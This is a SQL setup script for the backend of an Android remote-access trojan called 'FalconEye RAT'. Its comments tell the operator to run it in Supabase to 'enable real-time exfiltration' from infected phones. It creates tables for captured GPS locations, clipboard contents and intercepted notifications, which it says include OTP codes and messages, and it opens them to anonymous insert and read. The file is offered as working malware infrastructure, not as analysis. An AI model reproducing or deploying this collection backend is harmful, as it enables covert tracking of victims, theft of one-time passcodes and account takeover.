-- FalconEye RAT Supabase Sync Tables
-- Run these in your Supabase SQL Editor to enable real-time exfiltration from the Android device.

-- 1. Captured GPS Locations
CREATE TABLE IF NOT EXISTS captured_locations (
  id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
  created_at TIMESTAMP WITH TIME ZONE DEFAULT timezone('utc'::text, now()) NOT NULL,
  client_id TEXT,
  latitude FLOAT,
  longitude FLOAT,
  altitude FLOAT,
  accuracy FLOAT,
  speed FLOAT,
  timestamp TEXT
);

ALTER TABLE captured_locations ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Enable insert for all" ON captured_locations FOR INSERT WITH CHECK (true);
CREATE POLICY "Enable read for all" ON captured_locations FOR SELECT USING (true);

-- 2. Captured Clipboard Content
CREATE TABLE IF NOT EXISTS captured_clipboard (
  id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
  created_at TIMESTAMP WITH TIME ZONE DEFAULT timezone('utc'::text, now()) NOT NULL,
  client_id TEXT,
  content TEXT,
  timestamp TEXT
);

ALTER TABLE captured_clipboard ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Enable insert for all" ON captured_clipboard FOR INSERT WITH CHECK (true);
CREATE POLICY "Enable read for all" ON captured_clipboard FOR SELECT USING (true);

-- 3. Captured Notifications (OTP & Message Interception)
CREATE TABLE IF NOT EXISTS captured_notifications (
  id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
  created_at TIMESTAMP WITH TIME ZONE DEFAULT timezone('utc'::text, now()) NOT NULL,
  client_id TEXT,
  app_name TEXT,
  content TEXT,
  post_time BIGINT,
  timestamp TEXT
);

ALTER TABLE captured_notifications ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Enable insert for all" ON captured_notifications FOR INSERT WITH CHECK (true);
CREATE POLICY "Enable read for all" ON captured_notifications FOR SELECT USING (true);
